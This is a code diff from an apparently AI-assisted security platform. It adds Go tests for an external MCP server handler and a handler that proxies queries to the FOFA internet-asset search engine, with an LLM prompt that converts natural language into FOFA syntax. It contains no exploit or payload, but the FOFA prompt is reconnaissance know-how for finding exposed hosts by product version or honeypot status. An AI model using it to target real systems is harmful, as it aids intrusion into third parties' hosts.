Status string `json:"status"` // "connected", "disconnected", "disabled", "error", "connecting"
ToolCount int `json:"tool_count"` // 工具数量
Error string `json:"error,omitempty"` // 错误信息(仅在status为error时存在)
}
+78 -78
View File
@@ -11,6 +11,7 @@ import (
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
)
@@ -18,7 +19,7 @@ import (
func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
gin.SetMode(gin.TestMode)
router := gin.New()
// 创建临时配置文件
tmpFile, err := os.CreateTemp("", "test-config-*.yaml")
if err != nil {
@@ -27,7 +28,7 @@ func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
tmpFile.WriteString("server:\n host: 0.0.0.0\n port: 8080\n")
tmpFile.Close()
configPath := tmpFile.Name()
logger := zap.NewNop()
manager := mcp.NewExternalMCPManager(logger)
cfg := &config.Config{
@@ -35,9 +36,9 @@ func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
Servers: make(map[string]config.ExternalMCPServerConfig),
},
}
handler := NewExternalMCPHandler(manager, cfg, configPath, logger)
api := router.Group("/api")
api.GET("/external-mcp", handler.GetExternalMCPs)
api.GET("/external-mcp/stats", handler.GetExternalMCPStats)
@@ -46,7 +47,7 @@ func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
api.DELETE("/external-mcp/:name", handler.DeleteExternalMCP)
api.POST("/external-mcp/:name/start", handler.StartExternalMCP)
api.POST("/external-mcp/:name/stop", handler.StopExternalMCP)
return router, handler, configPath
}
@@ -58,7 +59,7 @@ func cleanupTestConfig(configPath string) {
func TestExternalMCPHandler_AddOrUpdateExternalMCP_Stdio(t *testing.T) {
router, _, configPath := setupTestRouter()
defer cleanupTestConfig(configPath)
// 测试添加stdio模式的配置
configJSON := `{
"command": "python3",
@@ -67,41 +68,41 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_Stdio(t *testing.T) {
"timeout": 300,
"enabled": true
}`
var configObj config.ExternalMCPServerConfig
if err := json.Unmarshal([]byte(configJSON), &configObj); err != nil {
t.Fatalf("解析配置JSON失败: %v", err)
}
reqBody := AddOrUpdateExternalMCPRequest{
Config: configObj,
}
body, _ := json.Marshal(reqBody)
req := httptest.NewRequest("PUT", "/api/external-mcp/test-stdio", bytes.NewBuffer(body))
req.Header.Set("Content-Type", "application/json")
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
}
// 验证配置已添加
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-stdio", nil)
w2 := httptest.NewRecorder()
router.ServeHTTP(w2, req2)
if w2.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
}
var response ExternalMCPResponse
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
t.Fatalf("解析响应失败: %v", err)
}
if response.Config.Command != "python3" {
t.Errorf("期望command为python3,实际%s", response.Config.Command)
}
@@ -122,48 +123,48 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_Stdio(t *testing.T) {
func TestExternalMCPHandler_AddOrUpdateExternalMCP_HTTP(t *testing.T) {
router, _, configPath := setupTestRouter()
defer cleanupTestConfig(configPath)
// 测试添加HTTP模式的配置
configJSON := `{
"transport": "http",
"url": "http://127.0.0.1:8081/mcp",
"enabled": true
}`
var configObj config.ExternalMCPServerConfig
if err := json.Unmarshal([]byte(configJSON), &configObj); err != nil {
t.Fatalf("解析配置JSON失败: %v", err)
}
reqBody := AddOrUpdateExternalMCPRequest{
Config: configObj,
}
body, _ := json.Marshal(reqBody)
req := httptest.NewRequest("PUT", "/api/external-mcp/test-http", bytes.NewBuffer(body))
req.Header.Set("Content-Type", "application/json")
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
}
// 验证配置已添加
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-http", nil)
w2 := httptest.NewRecorder()
router.ServeHTTP(w2, req2)
if w2.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
}
var response ExternalMCPResponse
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
t.Fatalf("解析响应失败: %v", err)
}
if response.Config.Transport != "http" {
t.Errorf("期望transport为http,实际%s", response.Config.Transport)
}
@@ -178,7 +179,7 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_HTTP(t *testing.T) {
func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
router, _, configPath := setupTestRouter()
defer cleanupTestConfig(configPath)
testCases := []struct {
name string
configJSON string
@@ -187,7 +188,7 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
{
name: "缺少command和url",
configJSON: `{"enabled": true}`,
expectedErr: "需要指定commandstdio模式)或urlhttp模式)",
expectedErr: "需要指定commandstdio模式)或urlhttp/sse模式)",
},
{
name: "stdio模式缺少command",
@@ -205,34 +206,34 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
expectedErr: "不支持的传输模式",
},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
var configObj config.ExternalMCPServerConfig
if err := json.Unmarshal([]byte(tc.configJSON), &configObj); err != nil {
t.Fatalf("解析配置JSON失败: %v", err)
}
reqBody := AddOrUpdateExternalMCPRequest{
Config: configObj,
}
body, _ := json.Marshal(reqBody)
req := httptest.NewRequest("PUT", "/api/external-mcp/test-invalid", bytes.NewBuffer(body))
req.Header.Set("Content-Type", "application/json")
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusBadRequest {
t.Errorf("期望状态码400,实际%d: %s", w.Code, w.Body.String())
}
var response map[string]interface{}
if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
t.Fatalf("解析响应失败: %v", err)
}
errorMsg := response["error"].(string)
// 对于stdio模式缺少command的情况,错误信息可能略有不同
if tc.name == "stdio模式缺少command" {
@@ -249,28 +250,28 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
router, handler, configPath := setupTestRouter()
defer cleanupTestConfig(configPath)
// 先添加一个配置
configObj := config.ExternalMCPServerConfig{
Command: "python3",
Enabled: true,
}
handler.manager.AddOrUpdateConfig("test-delete", configObj)
// 删除配置
req := httptest.NewRequest("DELETE", "/api/external-mcp/test-delete", nil)
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
}
// 验证配置已删除
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-delete", nil)
w2 := httptest.NewRecorder()
router.ServeHTTP(w2, req2)
if w2.Code != http.StatusNotFound {
t.Errorf("期望状态码404,实际%d: %s", w2.Code, w2.Body.String())
}
@@ -278,7 +279,7 @@ func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
router, handler, _ := setupTestRouter()
// 添加多个配置
handler.manager.AddOrUpdateConfig("test1", config.ExternalMCPServerConfig{
Command: "python3",
@@ -288,20 +289,20 @@ func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
URL: "http://127.0.0.1:8081/mcp",
Enabled: false,
})
req := httptest.NewRequest("GET", "/api/external-mcp", nil)
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
}
var response map[string]interface{}
if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
t.Fatalf("解析响应失败: %v", err)
}
servers := response["servers"].(map[string]interface{})
if len(servers) != 2 {
t.Errorf("期望2个服务器,实际%d", len(servers))
@@ -312,7 +313,7 @@ func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
if _, ok := servers["test2"]; !ok {
t.Error("期望包含test2")
}
stats := response["stats"].(map[string]interface{})
if int(stats["total"].(float64)) != 2 {
t.Errorf("期望总数为2,实际%d", int(stats["total"].(float64)))
@@ -321,7 +322,7 @@ func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) {
router, handler, _ := setupTestRouter()
// 添加配置
handler.manager.AddOrUpdateConfig("enabled1", config.ExternalMCPServerConfig{
Command: "python3",
@@ -336,20 +337,20 @@ func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) {
Enabled: false,
Disabled: true,
})
req := httptest.NewRequest("GET", "/api/external-mcp/stats", nil)
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
}
var stats map[string]interface{}
if err := json.Unmarshal(w.Body.Bytes(), &stats); err != nil {
t.Fatalf("解析响应失败: %v", err)
}
if int(stats["total"].(float64)) != 3 {
t.Errorf("期望总数为3,实际%d", int(stats["total"].(float64)))
}
@@ -364,19 +365,19 @@ func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) {
func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) {
router, handler, configPath := setupTestRouter()
defer cleanupTestConfig(configPath)
// 添加一个禁用的配置
handler.manager.AddOrUpdateConfig("test-start-stop", config.ExternalMCPServerConfig{
Command: "python3",
Enabled: false,
Disabled: true,
})
// 测试启动(可能会失败,因为没有真实的服务器)
req := httptest.NewRequest("POST", "/api/external-mcp/test-start-stop/start", nil)
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
// 启动可能会失败,但应该返回合理的状态码
if w.Code != http.StatusOK {
// 如果启动失败,应该是400或500
@@ -384,12 +385,12 @@ func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) {
t.Errorf("期望状态码200/400/500,实际%d: %s", w.Code, w.Body.String())
}
}
// 测试停止
req2 := httptest.NewRequest("POST", "/api/external-mcp/test-start-stop/stop", nil)
w2 := httptest.NewRecorder()
router.ServeHTTP(w2, req2)
if w2.Code != http.StatusOK {
t.Errorf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
}
@@ -397,11 +398,11 @@ func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) {
func TestExternalMCPHandler_GetExternalMCP_NotFound(t *testing.T) {
router, _, _ := setupTestRouter()
req := httptest.NewRequest("GET", "/api/external-mcp/nonexistent", nil)
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusNotFound {
t.Errorf("期望状态码404,实际%d: %s", w.Code, w.Body.String())
}
@@ -410,11 +411,11 @@ func TestExternalMCPHandler_GetExternalMCP_NotFound(t *testing.T) {
func TestExternalMCPHandler_DeleteExternalMCP_NotFound(t *testing.T) {
router, _, configPath := setupTestRouter()
defer cleanupTestConfig(configPath)
req := httptest.NewRequest("DELETE", "/api/external-mcp/nonexistent", nil)
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
// 删除不存在的配置可能返回200(幂等操作)或404,都是合理的
if w.Code != http.StatusNotFound && w.Code != http.StatusOK {
t.Errorf("期望状态码404或200,实际%d: %s", w.Code, w.Body.String())
@@ -423,23 +424,23 @@ func TestExternalMCPHandler_DeleteExternalMCP_NotFound(t *testing.T) {
func TestExternalMCPHandler_AddOrUpdateExternalMCP_EmptyName(t *testing.T) {
router, _, _ := setupTestRouter()
configObj := config.ExternalMCPServerConfig{
Command: "python3",
Enabled: true,
}
reqBody := AddOrUpdateExternalMCPRequest{
Config: configObj,
}
body, _ := json.Marshal(reqBody)
req := httptest.NewRequest("PUT", "/api/external-mcp/", bytes.NewBuffer(body))
req.Header.Set("Content-Type", "application/json")
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
// 空名称应该返回404或400
if w.Code != http.StatusNotFound && w.Code != http.StatusBadRequest {
t.Errorf("期望状态码404或400,实际%d: %s", w.Code, w.Body.String())
@@ -448,15 +449,15 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_EmptyName(t *testing.T) {
func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidJSON(t *testing.T) {
router, _, _ := setupTestRouter()
// 发送无效的JSON
body := []byte(`{"config": invalid json}`)
req := httptest.NewRequest("PUT", "/api/external-mcp/test", bytes.NewBuffer(body))
req.Header.Set("Content-Type", "application/json")
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusBadRequest {
t.Errorf("期望状态码400,实际%d: %s", w.Code, w.Body.String())
}
@@ -465,49 +466,49 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidJSON(t *testing.T) {
func TestExternalMCPHandler_UpdateExistingConfig(t *testing.T) {
router, handler, configPath := setupTestRouter()
defer cleanupTestConfig(configPath)
// 先添加配置
config1 := config.ExternalMCPServerConfig{
Command: "python3",
Enabled: true,
}
handler.manager.AddOrUpdateConfig("test-update", config1)
// 更新配置
config2 := config.ExternalMCPServerConfig{
URL: "http://127.0.0.1:8081/mcp",
Enabled: true,
}
reqBody := AddOrUpdateExternalMCPRequest{
Config: config2,
}
body, _ := json.Marshal(reqBody)
req := httptest.NewRequest("PUT", "/api/external-mcp/test-update", bytes.NewBuffer(body))
req.Header.Set("Content-Type", "application/json")
w := httptest.NewRecorder()
router.ServeHTTP(w, req)
if w.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
}
// 验证配置已更新
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-update", nil)
w2 := httptest.NewRecorder()
router.ServeHTTP(w2, req2)
if w2.Code != http.StatusOK {
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
}
var response ExternalMCPResponse
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
t.Fatalf("解析响应失败: %v", err)
}
if response.Config.URL != "http://127.0.0.1:8081/mcp" {
t.Errorf("期望url为'http://127.0.0.1:8081/mcp',实际%s", response.Config.URL)
}
@@ -515,4 +516,3 @@ func TestExternalMCPHandler_UpdateExistingConfig(t *testing.T) {
t.Errorf("期望command为空,实际%s", response.Config.Command)
}
}
+467
View File
@@ -0,0 +1,467 @@
package handler
import (
"context"
"encoding/base64"
"encoding/json"
"errors"
"fmt"
"net/http"
"net/url"
"os"
"strings"
"time"
"cyberstrike-ai/internal/config"
openaiClient "cyberstrike-ai/internal/openai"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
)
type FofaHandler struct {
cfg *config.Config
logger *zap.Logger
client *http.Client
openAIClient *openaiClient.Client
}
func NewFofaHandler(cfg *config.Config, logger *zap.Logger) *FofaHandler {
// LLM 请求通常比 FOFA 查询更慢一点,单独给一个更宽松的超时。
llmHTTPClient := &http.Client{Timeout: 2 * time.Minute}
var llmCfg *config.OpenAIConfig
if cfg != nil {
llmCfg = &cfg.OpenAI
}
return &FofaHandler{
cfg: cfg,
logger: logger,
client: &http.Client{Timeout: 30 * time.Second},
openAIClient: openaiClient.NewClient(llmCfg, llmHTTPClient, logger),
}
}
type fofaSearchRequest struct {
Query string `json:"query" binding:"required"`
Size int `json:"size,omitempty"`
Page int `json:"page,omitempty"`
Fields string `json:"fields,omitempty"`
Full bool `json:"full,omitempty"`
}
type fofaParseRequest struct {
Text string `json:"text" binding:"required"`
}
type fofaParseResponse struct {
Query string `json:"query"`
Explanation string `json:"explanation,omitempty"`
Warnings []string `json:"warnings,omitempty"`
}
type fofaAPIResponse struct {
Error bool `json:"error"`
ErrMsg string `json:"errmsg"`
Size int `json:"size"`
Page int `json:"page"`
Total int `json:"total"`
Mode string `json:"mode"`
Query string `json:"query"`
Results [][]interface{} `json:"results"`
}
type fofaSearchResponse struct {
Query string `json:"query"`
Size int `json:"size"`
Page int `json:"page"`
Total int `json:"total"`
Fields []string `json:"fields"`
ResultsCount int `json:"results_count"`
Results []map[string]interface{} `json:"results"`
}
func (h *FofaHandler) resolveCredentials() (email, apiKey string) {
// 优先环境变量(便于容器部署),其次配置文件
email = strings.TrimSpace(os.Getenv("FOFA_EMAIL"))
apiKey = strings.TrimSpace(os.Getenv("FOFA_API_KEY"))
if email != "" && apiKey != "" {
return email, apiKey
}
if h.cfg != nil {
if email == "" {
email = strings.TrimSpace(h.cfg.FOFA.Email)
}
if apiKey == "" {
apiKey = strings.TrimSpace(h.cfg.FOFA.APIKey)
}
}
return email, apiKey
}
func (h *FofaHandler) resolveBaseURL() string {
if h.cfg != nil {
if v := strings.TrimSpace(h.cfg.FOFA.BaseURL); v != "" {
return v
}
}
return "https://fofa.info/api/v1/search/all"
}
// ParseNaturalLanguage 将自然语言解析为 FOFA 查询语法(仅生成,不执行查询)
func (h *FofaHandler) ParseNaturalLanguage(c *gin.Context) {
var req fofaParseRequest
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
return
}
req.Text = strings.TrimSpace(req.Text)
if req.Text == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "text 不能为空"})
return
}
if h.cfg == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "系统配置未初始化"})
return
}
if strings.TrimSpace(h.cfg.OpenAI.APIKey) == "" || strings.TrimSpace(h.cfg.OpenAI.Model) == "" {
c.JSON(http.StatusBadRequest, gin.H{
"error": "未配置 AI 模型:请在系统设置中填写 openai.api_key 与 openai.model(支持 OpenAI 兼容 API,如 DeepSeek",
"need": []string{"openai.api_key", "openai.model"},
})
return
}
if h.openAIClient == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "AI 客户端未初始化"})
return
}
systemPrompt := strings.TrimSpace(`
你是“FOFA 查询语法生成器”。任务:把用户输入的自然语言搜索意图,转换成 FOFA 查询语法。
输出要求(非常重要):
1) 只输出 JSON(不要 markdown、不要代码块、不要额外解释文本)
2) JSON 结构必须是:
{
"query": "stringFOFA查询语法(可直接粘贴到 FOFA 或本系统查询框)",
"explanation": "string,可选,解释你如何映射字段/逻辑",
"warnings": ["string"...] 可选,列出歧义/风险/需要人工确认的点
}
3) 如果用户输入本身已经是 FOFA 查询语法(或非常接近 FOFA 语法的表达式),应当“原样返回”为 query:
- 不要擅自改写字段名、操作符、括号结构
- 不要改写任何字符串值(尤其是地理位置类值),不要做缩写/同义词替换/翻译/音译
查询语法要点(来自 FOFA 语法参考):
- 逻辑连接符:&&(与)、||(或),必要时用 () 包住子表达式以确认优先级(括号优先级最高)
- 当同一层级同时出现 && 与 ||(混用)时,用 () 明确优先级(避免歧义)
- 比较/匹配:
- = 匹配;当字段="" 时,可查询“不存在该字段”或“值为空”的情况
- == 完全匹配;当字段=="" 时,可查询“字段存在且值为空”的情况
- != 不匹配;当字段!="" 时,可查询“值不为空”的情况
- *= 模糊匹配;可使用 * 或 ? 进行搜索
- 直接输入关键词(不带字段)会在标题、HTML内容、HTTP头、URL字段中搜索;但当意图明确时优先用字段表达(更可控、更准确)
字段示例速查(来自用户提供的案例,可直接套用/拼接):
- 高级搜索操作符示例:
- title="beijing" (= 匹配)
- title=="" (== 完全匹配,字段存在且值为空)
- title="" (= 匹配,可能表示字段不存在或值为空)
- title!="" (!= 不匹配,可用于值不为空)
- title*="*Home*" (*= 模糊匹配,用 * 或 ?)
- (app="Apache" || app="Nginx") && country="CN" (混用 && / || 时用括号)
- 基础类(General):
- ip="1.1.1.1"
- ip="220.181.111.1/24"
- ip="2600:9000:202a:2600:18:4ab7:f600:93a1"
- port="6379"
- domain="qq.com"
- host=".fofa.info"
- os="centos"
- server="Microsoft-IIS/10"
- asn="19551"
- org="LLC Baxet"
- is_domain=true / is_domain=false
- is_ipv6=true / is_ipv6=false
- 标记类(Special Label):
- app="Microsoft-Exchange"
- fid="sSXXGNUO2FefBTcCLIT/2Q=="
- product="NGINX"
- product="Roundcube-Webmail" && product.version="1.6.10"
- category="服务"
- type="service" / type="subdomain"
- cloud_name="Aliyundun"
- is_cloud=true / is_cloud=false
- is_fraud=true / is_fraud=false
- is_honeypot=true / is_honeypot=false
- 协议类(type=service):
- protocol="quic"
- banner="users"
- banner_hash="7330105010150477363"
- banner_fid="zRpqmn0FXQRjZpH8MjMX55zpMy9SgsW8"
- base_protocol="udp" / base_protocol="tcp"
- 网站类(type=subdomain):
- title="beijing"
- header="elastic"
- header_hash="1258854265"
- body="网络空间测绘"
- body_hash="-2090962452"
- js_name="js/jquery.js"
- js_md5="82ac3f14327a8b7ba49baa208d4eaa15"
- cname="customers.spektrix.com"
- cname_domain="siteforce.com"
- icon_hash="-247388890"
- status_code="402"
- icp="京ICP证030173号"
- sdk_hash="Are3qNnP2Eqn7q5kAoUO3l+w3mgVIytO"
- 地理位置(Location):
- country="CN" 或 country="中国"
- region="Zhejiang" 或 region="浙江"(仅支持中国地区中文)
- city="Hangzhou"
- 证书类(Certificate):
- cert="baidu"
- cert.subject="Oracle Corporation"
- cert.issuer="DigiCert"
- cert.subject.org="Oracle Corporation"
- cert.subject.cn="baidu.com"
- cert.issuer.org="cPanel, Inc."
- cert.issuer.cn="Synology Inc. CA"
- cert.domain="huawei.com"
- cert.is_equal=true / cert.is_equal=false
- cert.is_valid=true / cert.is_valid=false
- cert.is_match=true / cert.is_match=false
- cert.is_expired=true / cert.is_expired=false
- jarm="2ad2ad0002ad2ad22c2ad2ad2ad2ad2eac92ec34bcc0cf7520e97547f83e81"
- tls.version="TLS 1.3"
- tls.ja3s="15af977ce25de452b96affa2addb1036"
- cert.sn="356078156165546797850343536942784588840297"
- cert.not_after.after="2025-03-01" / cert.not_after.before="2025-03-01"
- cert.not_before.after="2025-03-01" / cert.not_before.before="2025-03-01"
- 时间类(Last update time):
- after="2023-01-01"
- before="2023-12-01"
- after="2023-01-01" && before="2023-12-01"
- 独立IP语法(需配合 ip_filter / ip_exclude):
- ip_filter(banner="SSH-2.0-OpenSSH_6.7p2") && ip_filter(icon_hash="-1057022626")
- ip_filter(banner="SSH-2.0-OpenSSH_6.7p2" && asn="3462") && ip_exclude(title="EdgeOS")
- port_size="6" / port_size_gt="6" / port_size_lt="12"
- ip_ports="80,161"
- ip_country="CN"
- ip_region="Zhejiang"
- ip_city="Hangzhou"
- ip_after="2021-03-18"
- ip_before="2019-09-09"
生成约束与注意事项:
- 字符串值一律用英文双引号包裹,例如 title="登录"、country="CN"
- 字符串值保持字面一致:不要缩写(例如 city="beijing" 不要变成 city="BJ"),不要用别名(例如 Beijing/Peking),不要擅自翻译/音译/改写大小写
- 地理位置字段(country/region/city)更倾向于“按用户给定值输出”;不确定合法取值时,不要猜测,把备选写进 warnings
- 不要捏造不存在的 FOFA 字段;不确定时把不确定点写进 warnings,并输出一个保守的 query
- 当用户描述里有“多个与/或条件”,优先加 () 明确优先级,例如:(app="Apache" || app="Nginx") && country="CN"
- 当用户缺少关键条件导致范围过大或歧义(如地点/协议/端口/服务类型未说明),允许 query 为空字符串,并在 warnings 里明确需要补充的信息
`)
userPrompt := fmt.Sprintf("自然语言意图:%s", req.Text)
requestBody := map[string]interface{}{
"model": h.cfg.OpenAI.Model,
"messages": []map[string]interface{}{
{"role": "system", "content": systemPrompt},
{"role": "user", "content": userPrompt},
},
"temperature": 0.1,
"max_tokens": 1200,
}
// OpenAI 返回结构:只需要 choices[0].message.content
var apiResponse struct {
Choices []struct {
Message struct {
Content string `json:"content"`
} `json:"message"`
} `json:"choices"`
}
ctx, cancel := context.WithTimeout(c.Request.Context(), 90*time.Second)
defer cancel()
if err := h.openAIClient.ChatCompletion(ctx, requestBody, &apiResponse); err != nil {
var apiErr *openaiClient.APIError
if errors.As(err, &apiErr) {
h.logger.Warn("FOFA自然语言解析:LLM返回错误", zap.Int("status", apiErr.StatusCode))
c.JSON(http.StatusBadGateway, gin.H{"error": "AI 解析失败(上游返回非 200),请检查模型配置或稍后重试"})
return
}
c.JSON(http.StatusBadGateway, gin.H{"error": "AI 解析失败: " + err.Error()})
return
}
if len(apiResponse.Choices) == 0 {
c.JSON(http.StatusBadGateway, gin.H{"error": "AI 未返回有效结果"})
return
}
content := strings.TrimSpace(apiResponse.Choices[0].Message.Content)
// 兼容模型偶尔返回 ```json ... ``` 的情况
content = strings.TrimPrefix(content, "```json")
content = strings.TrimPrefix(content, "```")
content = strings.TrimSuffix(content, "```")
content = strings.TrimSpace(content)
var parsed fofaParseResponse
if err := json.Unmarshal([]byte(content), &parsed); err != nil {
// 直接回传一部分原文,方便排查,但避免太大
snippet := content
if len(snippet) > 1200 {
snippet = snippet[:1200]
}
c.JSON(http.StatusBadGateway, gin.H{
"error": "AI 返回内容无法解析为 JSON,请稍后重试或换个描述方式",
"snippet": snippet,
})
return
}
parsed.Query = strings.TrimSpace(parsed.Query)
if parsed.Query == "" {
// query 允许为空(表示需求不明确),但前端需要明确提示
if len(parsed.Warnings) == 0 {
parsed.Warnings = []string{"需求信息不足,未能生成可用的 FOFA 查询语法,请补充关键条件(如国家/端口/产品/域名等)。"}
}
}
c.JSON(http.StatusOK, parsed)
}
// Search FOFA 查询(后端代理,避免前端暴露 key)
func (h *FofaHandler) Search(c *gin.Context) {
var req fofaSearchRequest
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
return
}
req.Query = strings.TrimSpace(req.Query)
if req.Query == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "query 不能为空"})
return
}
if req.Size <= 0 {
req.Size = 100
}
if req.Page <= 0 {
req.Page = 1
}
// FOFA 接口 size 上限和账户权限相关,这里只做一个合理的保护
if req.Size > 10000 {
req.Size = 10000
}
if req.Fields == "" {
req.Fields = "host,ip,port,domain,title,protocol,country,province,city,server"
}
email, apiKey := h.resolveCredentials()
if email == "" || apiKey == "" {
c.JSON(http.StatusBadRequest, gin.H{
"error": "FOFA 未配置:请在系统设置中填写 FOFA Email/API Key,或设置环境变量 FOFA_EMAIL/FOFA_API_KEY",
"need": []string{"fofa.email", "fofa.api_key"},
"env_key": []string{"FOFA_EMAIL", "FOFA_API_KEY"},
})
return
}
baseURL := h.resolveBaseURL()
qb64 := base64.StdEncoding.EncodeToString([]byte(req.Query))
u, err := url.Parse(baseURL)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "FOFA base_url 无效: " + err.Error()})
return
}
params := u.Query()
params.Set("email", email)
params.Set("key", apiKey)
params.Set("qbase64", qb64)
params.Set("size", fmt.Sprintf("%d", req.Size))
params.Set("page", fmt.Sprintf("%d", req.Page))
params.Set("fields", strings.TrimSpace(req.Fields))
if req.Full {
params.Set("full", "true")
} else {
// 明确传 false,便于排查
params.Set("full", "false")
}
u.RawQuery = params.Encode()
httpReq, err := http.NewRequestWithContext(c.Request.Context(), http.MethodGet, u.String(), nil)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建请求失败: " + err.Error()})
return
}
resp, err := h.client.Do(httpReq)
if err != nil {
c.JSON(http.StatusBadGateway, gin.H{"error": "请求 FOFA 失败: " + err.Error()})
return
}
defer resp.Body.Close()
if resp.StatusCode < 200 || resp.StatusCode >= 300 {
c.JSON(http.StatusBadGateway, gin.H{"error": fmt.Sprintf("FOFA 返回非 2xx: %d", resp.StatusCode)})
return
}
var apiResp fofaAPIResponse
if err := json.NewDecoder(resp.Body).Decode(&apiResp); err != nil {
c.JSON(http.StatusBadGateway, gin.H{"error": "解析 FOFA 响应失败: " + err.Error()})
return
}
if apiResp.Error {
msg := strings.TrimSpace(apiResp.ErrMsg)
if msg == "" {
msg = "FOFA 返回错误"
}
c.JSON(http.StatusBadGateway, gin.H{"error": msg})
return
}
fields := splitAndCleanCSV(req.Fields)
results := make([]map[string]interface{}, 0, len(apiResp.Results))
for _, row := range apiResp.Results {
item := make(map[string]interface{}, len(fields))
for i, f := range fields {
if i < len(row) {
item[f] = row[i]
} else {
item[f] = nil
}
}
results = append(results, item)
}
c.JSON(http.StatusOK, fofaSearchResponse{
Query: req.Query,
Size: apiResp.Size,
Page: apiResp.Page,
Total: apiResp.Total,
Fields: fields,
ResultsCount: len(results),
Results: results,
})
}
func splitAndCleanCSV(s string) []string {
parts := strings.Split(s, ",")
out := make([]string, 0, len(parts))
seen := make(map[string]struct{}, len(parts))
for _, p := range parts {
v := strings.TrimSpace(p)
if v == "" {
continue
}
if _, ok := seen[v]; ok {
continue
}
seen[v] = struct{}{}
out = append(out, v)
}
return out
}
+67 -30
View File
@@ -15,11 +15,11 @@ import (
// KnowledgeHandler 知识库处理器
type KnowledgeHandler struct {
manager *knowledge.Manager
manager *knowledge.Manager
retriever *knowledge.Retriever
indexer *knowledge.Indexer
db *database.DB
logger *zap.Logger
indexer *knowledge.Indexer
db *database.DB
logger *zap.Logger
}
// NewKnowledgeHandler 创建新的知识库处理器
@@ -55,7 +55,7 @@ func (h *KnowledgeHandler) GetCategories(c *gin.Context) {
func (h *KnowledgeHandler) GetItems(c *gin.Context) {
category := c.Query("category")
searchKeyword := c.Query("search") // 搜索关键字
// 如果提供了搜索关键字,执行关键字搜索(在所有数据中搜索)
if searchKeyword != "" {
items, err := h.manager.SearchItemsByKeyword(searchKeyword, category)
@@ -75,7 +75,7 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
groupedByCategory[cat] = append(groupedByCategory[cat], item)
}
// 转换为CategoryWithItems格式
// 转换为 CategoryWithItems 格式
categoriesWithItems := make([]*knowledge.CategoryWithItems, 0, len(groupedByCategory))
for cat, catItems := range groupedByCategory {
categoriesWithItems = append(categoriesWithItems, &knowledge.CategoryWithItems{
